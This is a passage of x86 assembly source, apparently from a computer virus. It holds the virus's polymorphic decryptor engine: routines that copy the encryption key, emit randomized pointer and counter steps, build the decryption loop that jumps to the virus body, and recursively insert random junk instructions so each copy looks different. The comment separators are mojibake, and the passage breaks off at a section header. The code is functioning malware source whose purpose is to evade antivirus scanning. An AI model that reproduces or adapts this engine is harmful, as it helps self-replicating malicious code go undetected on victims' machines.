last_spell: call copy_key
|
||
end_of_magic: mov al,0C3h
|
||
stosb
|
||
pop edi
|
||
ret
|
||
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
;Copy encryption key into work buffer taking care about operand size
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
|
||
copy_key: mov eax,dword ptr [ebp+crypt_key]
|
||
xor ecx,ecx
|
||
mov cl,byte ptr [ebp+oper_size]
|
||
loop_key: stosb
|
||
shr eax,08h
|
||
loop loop_key
|
||
ret
|
||
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
;Generate decryptor action: Move index to next step
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
|
||
gen_next_step: ;Get number of bytes to inc or dec the index reg
|
||
|
||
xor ecx,ecx
|
||
mov cl,byte ptr [ebp+oper_size]
|
||
|
||
loop_update: ;Get number of bytes to update with this instruction
|
||
|
||
mov eax,ecx
|
||
call get_rnd_range
|
||
inc eax
|
||
|
||
;Check direction
|
||
|
||
test byte ptr [ebp+build_flags],CRYPT_DIRECTION
|
||
jnz step_down
|
||
|
||
call do_step_up
|
||
jmp short next_update
|
||
|
||
step_down: call do_step_down
|
||
|
||
next_update: sub ecx,eax
|
||
jecxz end_update
|
||
jmp short loop_update
|
||
end_update: ret
|
||
|
||
do_step_up: ;Move index_reg up
|
||
|
||
or eax,eax
|
||
jz up_with_inc
|
||
|
||
;Now choose ADD or SUB
|
||
|
||
push eax
|
||
call get_rnd32
|
||
and al,01h
|
||
jnz try_sub_1
|
||
|
||
try_add_1: mov ax,0C081h
|
||
or ah,byte ptr [ebp+index_mask]
|
||
stosw
|
||
pop eax
|
||
stosd
|
||
ret
|
||
|
||
try_sub_1: mov ax,0E881h
|
||
or ah,byte ptr [ebp+index_mask]
|
||
stosw
|
||
pop eax
|
||
neg eax
|
||
stosd
|
||
neg eax
|
||
ret
|
||
|
||
up_with_inc: ;Generate INC reg_index
|
||
|
||
mov al,40h
|
||
or al,byte ptr [ebp+index_mask]
|
||
stosb
|
||
mov eax,00000001h
|
||
ret
|
||
|
||
do_step_down: ;Move index_reg down
|
||
|
||
or eax,eax
|
||
jz down_with_dec
|
||
|
||
;Now choose ADD or SUB
|
||
|
||
push eax
|
||
call get_rnd32
|
||
and al,01h
|
||
jnz try_sub_2
|
||
|
||
try_add_2: mov ax,0C081h
|
||
or ah,byte ptr [ebp+index_mask]
|
||
stosw
|
||
pop eax
|
||
neg eax
|
||
stosd
|
||
neg eax
|
||
ret
|
||
|
||
try_sub_2: mov ax,0E881h
|
||
or ah,byte ptr [ebp+index_mask]
|
||
stosw
|
||
pop eax
|
||
stosd
|
||
ret
|
||
|
||
down_with_dec: ;Generate DEC reg_index
|
||
|
||
mov al,48h
|
||
or al,byte ptr [ebp+index_mask]
|
||
stosb
|
||
mov eax,00000001h
|
||
ret
|
||
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
;Generate decryptor action: Next counter value
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
|
||
gen_next_ctr: ;Check counter direction and update counter
|
||
;using a INC or DEC instruction
|
||
|
||
test byte ptr [ebp+build_flags],CRYPT_CDIR
|
||
jnz upd_ctr_down
|
||
upd_ctr_up: mov al,40h
|
||
or al,byte ptr [ebp+counter_mask]
|
||
jmp short upd_ctr_ok
|
||
upd_ctr_down: mov al,48h
|
||
or al,byte ptr [ebp+counter_mask]
|
||
upd_ctr_ok: stosb
|
||
ret
|
||
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
;Generate decryptor action: Loop
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
|
||
gen_loop: ;Use counter reg in CMP instruction?
|
||
|
||
test byte ptr [ebp+build_flags],CRYPT_CMPCTR
|
||
jnz doloopauxreg
|
||
|
||
;Generate CMP counter_reg,end_value
|
||
|
||
mov ax,0F881h
|
||
or ah,byte ptr [ebp+counter_mask]
|
||
stosw
|
||
mov eax,dword ptr [ebp+end_value]
|
||
stosd
|
||
|
||
jmp doloopready
|
||
|
||
doloopauxreg: ;Get a random valid register to use in a CMP instruction
|
||
|
||
call get_valid_reg
|
||
or byte ptr [ebx+REG_FLAGS],REG_READ_ONLY
|
||
|
||
;Move index reg value into aux reg
|
||
|
||
mov ah,byte ptr [ebx+REG_MASK]
|
||
shl ah,03h
|
||
or ah,byte ptr [ebp+counter_mask]
|
||
or ah,0C0h
|
||
mov al,8Bh
|
||
stosw
|
||
|
||
;Guess what!?
|
||
|
||
push ebx
|
||
call gen_garbage
|
||
pop ebx
|
||
|
||
;Generate CMP aux_reg,end_value
|
||
|
||
mov ax,0F881h
|
||
or ah,byte ptr [ebx+REG_MASK]
|
||
stosw
|
||
mov eax,dword ptr [ebp+end_value]
|
||
stosd
|
||
|
||
;Restore aux reg state
|
||
|
||
xor byte ptr [ebx+REG_FLAGS],REG_READ_ONLY
|
||
|
||
doloopready: ;Generate the following structure:
|
||
;
|
||
; loop_point:
|
||
; ...
|
||
; cmp reg,x
|
||
; jne loop_point
|
||
; ...
|
||
; jmp virus
|
||
; ...
|
||
|
||
mov ax,850Fh
|
||
stosw
|
||
mov eax,dword ptr [ebp+loop_point]
|
||
sub eax,edi
|
||
sub eax,00000004h
|
||
stosd
|
||
ret
|
||
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
;Generate some garbage code
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
|
||
gen_garbage: ;More recursive levels allowed?
|
||
|
||
inc byte ptr [ebp+recursive_level]
|
||
cmp byte ptr [ebp+recursive_level],03h
|
||
jae exit_gg
|
||
|
||
;Well, we can call this routine from lots of places
|
||
;in the virus, so take care about direction flag
|
||
|
||
cld
|
||
|
||
;Choose garbage generator
|
||
|
||
mov eax,00000003h
|
||
call get_rnd_range
|
||
inc eax
|
||
mov ecx,eax
|
||
loop_garbage: push ecx
|
||
mov eax,(end_garbage-tbl_garbage)/04h
|
||
call get_rnd_range
|
||
lea esi,dword ptr [ebp+tbl_garbage+eax*04h]
|
||
lodsd
|
||
add eax,ebp
|
||
call eax
|
||
pop ecx
|
||
loop loop_garbage
|
||
|
||
;Update recursive level
|
||
|
||
exit_gg: dec byte ptr [ebp+recursive_level]
|
||
ret
|
||
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
;Generate MOV reg,imm
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
|
||
g_movreg32imm: ;Generate MOV reg32,imm
|
||
|
||
call get_valid_reg
|
||
mov al,0B8h
|
||
or al,byte ptr [ebx+REG_MASK]
|
||
stosb
|
||
call get_rnd32
|
||
stosd
|
||
ret
|
||
|
||
g_movreg16imm: ;Generate MOV reg16,imm
|
||
|
||
call get_valid_reg
|
||
mov ax,0B866h
|
||
or ah,byte ptr [ebx+REG_MASK]
|
||
stosw
|
||
call get_rnd32
|
||
stosw
|
||
ret
|
||
|
||
g_movreg8imm: ;Generate MOV reg8,imm
|
||
|
||
call get_valid_reg
|
||
test byte ptr [ebx+REG_FLAGS],REG_NO_8BIT
|
||
jnz a_movreg8imm
|
||
call get_rnd32
|
||
mov al,0B0h
|
||
or al,byte ptr [ebx+REG_MASK]
|
||
push eax
|
||
call get_rnd32
|
||
pop edx
|
||
and ax,0004h
|
||
or ax,dx
|
||
stosw
|
||
a_movreg8imm: ret
|
||
|
||
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
;Generate mov reg,reg
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
|
||
g_movregreg32: call get_rnd_reg
|
||
push ebx
|
||
call get_valid_reg
|
||
pop edx
|
||
cmp ebx,edx
|
||
je a_movregreg32
|
||
c_movregreg32: mov ah,byte ptr [ebx+REG_MASK]
|
||
shl ah,03h
|
||
or ah,byte ptr [edx+REG_MASK]
|
||
or ah,0C0h
|
||
mov al,8Bh
|
||
stosw
|
||
a_movregreg32: ret
|
||
|
||
g_movregreg16: call get_rnd_reg
|
||
push ebx
|
||
call get_valid_reg
|
||
pop edx
|
||
cmp ebx,edx
|
||
je a_movregreg32
|
||
mov al,66h
|
||
stosb
|
||
jmp short c_movregreg32
|
||
|
||
g_movregreg8: call get_rnd_reg
|
||
test byte ptr [ebx+REG_FLAGS],REG_NO_8BIT
|
||
jnz a_movregreg8
|
||
push ebx
|
||
call get_valid_reg
|
||
pop edx
|
||
test byte ptr [ebx+REG_FLAGS],REG_NO_8BIT
|
||
jnz a_movregreg8
|
||
cmp ebx,edx
|
||
je a_movregreg8
|
||
mov ah,byte ptr [ebx+REG_MASK]
|
||
shl ah,03h
|
||
or ah,byte ptr [edx+REG_MASK]
|
||
or ah,0C0h
|
||
mov al,8Ah
|
||
push eax
|
||
call get_rnd32
|
||
pop edx
|
||
and ax,2400h
|
||
or ax,dx
|
||
stosw
|
||
a_movregreg8: ret
|
||
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
;Generate MOVZX/MOVSX reg32,reg16
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
|
||
g_movzx_movsx: call get_rnd32
|
||
mov ah,0B7h
|
||
and al,01h
|
||
jz d_movzx
|
||
mov ah,0BFh
|
||
d_movzx: mov al,0Fh
|
||
stosw
|
||
call get_rnd_reg
|
||
push ebx
|
||
call get_valid_reg
|
||
pop edx
|
||
mov al,byte ptr [ebx+REG_MASK]
|
||
shl al,03h
|
||
or al,0C0h
|
||
or al,byte ptr [edx+REG_MASK]
|
||
stosb
|
||
ret
|
||
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
;Generate ADD/SUB/XOR/OR/AND reg,imm
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
|
||
g_mathregimm32: mov al,81h
|
||
stosb
|
||
call get_valid_reg
|
||
call do_math_work
|
||
stosd
|
||
ret
|
||
|
||
g_mathregimm16: mov ax,8166h
|
||
stosw
|
||
call get_valid_reg
|
||
call do_math_work
|
||
stosw
|
||
ret
|
||
|
||
g_mathregimm8: call get_valid_reg
|
||
test byte ptr [ebx+REG_FLAGS],REG_NO_8BIT
|
||
jnz a_math8
|
||
mov al,80h
|
||
stosb
|
||
call do_math_work
|
||
stosb
|
||
and ah,04h
|
||
or byte ptr [edi-00000002h],ah
|
||
a_math8: ret
|
||
|
||
do_math_work: mov eax,end_math_imm-tbl_math_imm
|
||
call get_rnd_range
|
||
lea esi,dword ptr [ebp+eax+tbl_math_imm]
|
||
lodsb
|
||
or al,byte ptr [ebx+REG_MASK]
|
||
stosb
|
||
call get_rnd32
|
||
ret
|
||
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
;Generate push reg + garbage + pop reg
|
||
